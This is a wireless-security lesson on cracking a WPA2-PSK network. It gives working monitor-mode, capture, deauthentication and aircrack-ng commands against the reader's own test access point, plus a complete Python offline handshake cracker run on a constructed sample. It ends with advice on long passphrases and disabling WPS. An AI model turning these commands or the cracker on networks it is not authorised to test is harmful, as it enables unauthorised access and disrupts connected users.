We are going to skip WPA and go straight to WPA2 with TKIP, because the four-way handshake attack shown here works the same way against WPA-PSK: if we can crack WPA2 we can crack WPA.
What does WPA stand for?
Wi-Fi Protected Access
How did it come about?
Well, if you were following the previous lessons you will have seen that the earlier security protocols are extremely vulnerable and trivial to crack or bypass. The Wi-Fi Alliance defined WPA, and later WPA2, in response to the research that uncovered those weaknesses.
WPA is more secure than WEP though so why should I be worried?
Well, nothing is really as secure as we think. Nothing is bulletproof or 100% secure, and there are 0-days out there that bypass these protocols which we don't yet know about. We will go through some of the known, publicly documented weaknesses that can be exploited with freely available tools to recover the password.
What if my password is really long?
Well, if you are using a 64-character password, congratulations: you are a lot more secure than most people out there, but if someone really wants you they will look for another way in. If your router has Wi-Fi Protected Setup (WPS) enabled, though, your 64-character password is only as strong as the 8-digit WPS PIN, and because the PIN is verified in two halves (with the last digit a checksum) an attacker only needs around 11,000 guesses to recover it, and with it your passphrase. So if you have WPS, disable it; if you have disabled it and it can still be attacked, get a different router. We will look at this in a future lesson.
Now that we have discussed WPA a little, let's move on with the lesson and crack it. As always, modify your access point settings to replicate the image below (WPA2, TKIP cipher, PSK authentication, ESSID "test", channel 6).
As always, put your card into monitor mode on channel 6 (airmon-ng creates the monitor interface mon0 used in the commands that follow):
airmon-ng start wlan0 6
Now that you have put your card into monitor mode you need to start airodump-ng in order to capture the traffic from the access point.
airodump-ng --bssid 00:18:E7:XX:XX:XX --channel 6 -w testcapture mon0
The -w prefix makes airodump-ng write the capture to testcapture-01.cap (the number increases on each run). You can see the following from the output:
BSSID is the access point MAC address
STATION is a client: either one associated with a BSSID, or one shown as "not associated" that is probing for an access point
CH or channel is set to 6
ENC or encryption type is set to WPA2
CIPHER is set to TKIP
AUTH or authentication is set to PSK aka Pre-Shared Key or Personal Mode
ESSID or the name of the access point is set to “test”
Now we are looking for the four-way handshake, and there are two ways to get it: number one, wait for a client to connect; number two, send de-authentication frames to an already-associated client (one listed under STATION against our BSSID) so it reconnects and we capture the handshake that way. We are going to focus on number two in this scenario.
aireplay-ng -0 2 -a 00:18:E7:XX:XX:XX -c F4:09:D8:XX:XX:XX mon0
-0 means deauthentication
2 is the number of deauth bursts to send (0 means keep sending until you stop it)
-a is the MAC address of the AP (the BSSID)
-c is the MAC of the client you are de-authenticating (leave it out and the deauth is broadcast to every client on the AP, which is noisier)
Now if you check back in your airodump-ng output you will see "WPA handshake: 00:18:E7:XX:XX:XX" in the top right, which means you have obtained the handshake.
At this point you can kill airodump-ng, but to verify that you captured either all four messages of the handshake or, at the minimum, the two that cracking needs (message 2, which carries the client's nonce and a MIC, together with message 1 or 3, which carries the AP's nonce), fire up Wireshark and take a look.
wireshark testcapture-01.cap &
Use the display filter eapol and click "Apply" to see only the EAPOL-Key packets, as these contain your handshake.
Now it's just a case of running aircrack-ng against the capture with a wordlist and cracking the password associated with it. In this case, to speed things up, I am going to create a little wordlist (wordlist.txt) so that we don't have to wait around for ages to see if we can crack it, especially as we already know the password!
aircrack-ng -w wordlist.txt -b 00:18:E7:XX:XX:XX testcapture*.cap
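To show what aircrack-ng is actually doing with those EAPOL frames, here is a small pure-Python cracker added to this lesson (it is not part of the original page and not aircrack-ng's own code). It derives the PMK from each wordlist candidate with PBKDF2, expands the PTK from the two MACs and two nonces, and checks the MIC on EAPOL-Key message 2, handling both the TKIP (HMAC-MD5) and CCMP (HMAC-SHA1) MIC variants. Since the BSSID on this page is redacted, the MACs, nonces, passphrase and message 2 frame are constructed inside the script and labelled as such; the classify_message helper mirrors the Wireshark eapol check above by telling the four messages apart from their Key Information flags.

```python
"""Pure-Python WPA/WPA2-PSK handshake cracker (hashlib/hmac only, no aircrack-ng).

Mirrors what aircrack-ng does with captured EAPOL frames: derive the PMK from
each candidate passphrase, expand the PTK from the two nonces and two MACs,
and compare the MIC on the captured EAPOL-Key message 2.
"""
import hashlib
import hmac
from typing import Iterable, Optional

MIC_OFFSET = 81  # EAPOL hdr 4 + desc type 1 + key info 2 + key len 2 + replay 8 + nonce 32 + IV 16 + RSC 8 + ID 8


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits). This is the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 over min/max of the MACs and nonces; the first 16 bytes are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    ]
    return b"".join(blocks)[:64]


def classify_message(eapol: bytes) -> int:
    """Which of the four handshake messages this EAPOL-Key frame is, from its Key Information flags."""
    key_info = int.from_bytes(eapol[5:7], "big")
    mic, ack, install = key_info & 0x0100, key_info & 0x0080, key_info & 0x0040
    if ack and not mic:
        return 1
    if ack and mic and install:
        return 3
    # Messages 2 and 4 both carry a MIC and no ACK; message 4 carries an all-zero nonce
    return 4 if eapol[17:49] == b"\x00" * 32 else 2


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the frame with its MIC field zeroed: descriptor version 1 (TKIP) is HMAC-MD5,
    version 2 (CCMP) is HMAC-SHA1 truncated to 128 bits."""
    version = eapol[6] & 0x07
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {version}")


def crack(hs: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose KCK reproduces the MIC on message 2, or None."""
    captured_mic = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:  # WPA passphrases are 8-63 chars; skip the rest, as aircrack-ng does
            continue
        pmk = derive_pmk(candidate, hs["ssid"])
        kck = derive_ptk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), captured_mic):
            return candidate
    return None


def make_sample(passphrase: str, version: int = 1) -> dict:
    """CONSTRUCTED handshake so the example runs offline (not a real capture): the BSSID on the page
    is redacted, so MACs, nonces and passphrase are made up, and message 2 is built and signed with
    the genuine KCK so the cracker has a real MIC to match."""
    hs = {
        "ssid": "test",  # ESSID shown in the airodump-ng output
        "ap_mac": bytes.fromhex("0018e7000001"),  # assumed BSSID
        "sta_mac": bytes.fromhex("f409d8000002"),  # assumed client MAC
        "anonce": bytes(range(32)),
        "snonce": bytes(range(32, 64)),
    }
    key_info = (0x0108 | version).to_bytes(2, "big")  # Pairwise | MIC | key descriptor version
    body = (bytes([2]) + key_info + (0).to_bytes(2, "big") + (1).to_bytes(8, "big")
            + hs["snonce"] + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + (0).to_bytes(2, "big"))
    eapol = bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # 802.1X v2, type 3 = EAPOL-Key
    kck = derive_ptk(derive_pmk(passphrase, hs["ssid"]), hs["ap_mac"], hs["sta_mac"],
                     hs["anonce"], hs["snonce"])[:16]
    hs["eapol"] = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + 16:]
    return hs


# Constructed "little list" like the one used in the lesson; the real passphrase is the third entry
WORDLIST = ["password", "12345678", "letmein1234", "qwertyuiop"]

if __name__ == "__main__":
    sample = make_sample("letmein1234")
    print("captured frame is handshake message", classify_message(sample["eapol"]))
    print("KEY FOUND:", crack(sample, WORDLIST))
```

Everything the attacker needs (ESSID, both MACs, both nonces and one MIC) is in the capture, which is why the cracking runs entirely offline; the PBKDF2 step with 4096 iterations per candidate is what makes a long random passphrase expensive to guess, and the TKIP/CCMP choice only changes which HMAC computes the MIC, not the cost of the attack.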
Even WPA/WPA2-PSK can be broken this way; all it takes is an attacker with some patience to passively monitor the air for your four-way handshake, or to actively de-authenticate you in order to force one. Note that the cipher (TKIP here, or CCMP/AES) makes no difference to this attack: it targets the pre-shared key, not the encryption. Once the four-way handshake has been captured, that is all that is required to attack your key off-site, either by uploading it to a cloud cracking service or by running a GPU cracker, without the attacker having to stay anywhere near your access point. Depending on the attacker's resources and the strength of your password, this can take anywhere from a few minutes to months or years, and a long, random passphrase that is not in any wordlist will not be recovered in any practical time. So use an extremely long, random password to mitigate this form of attack.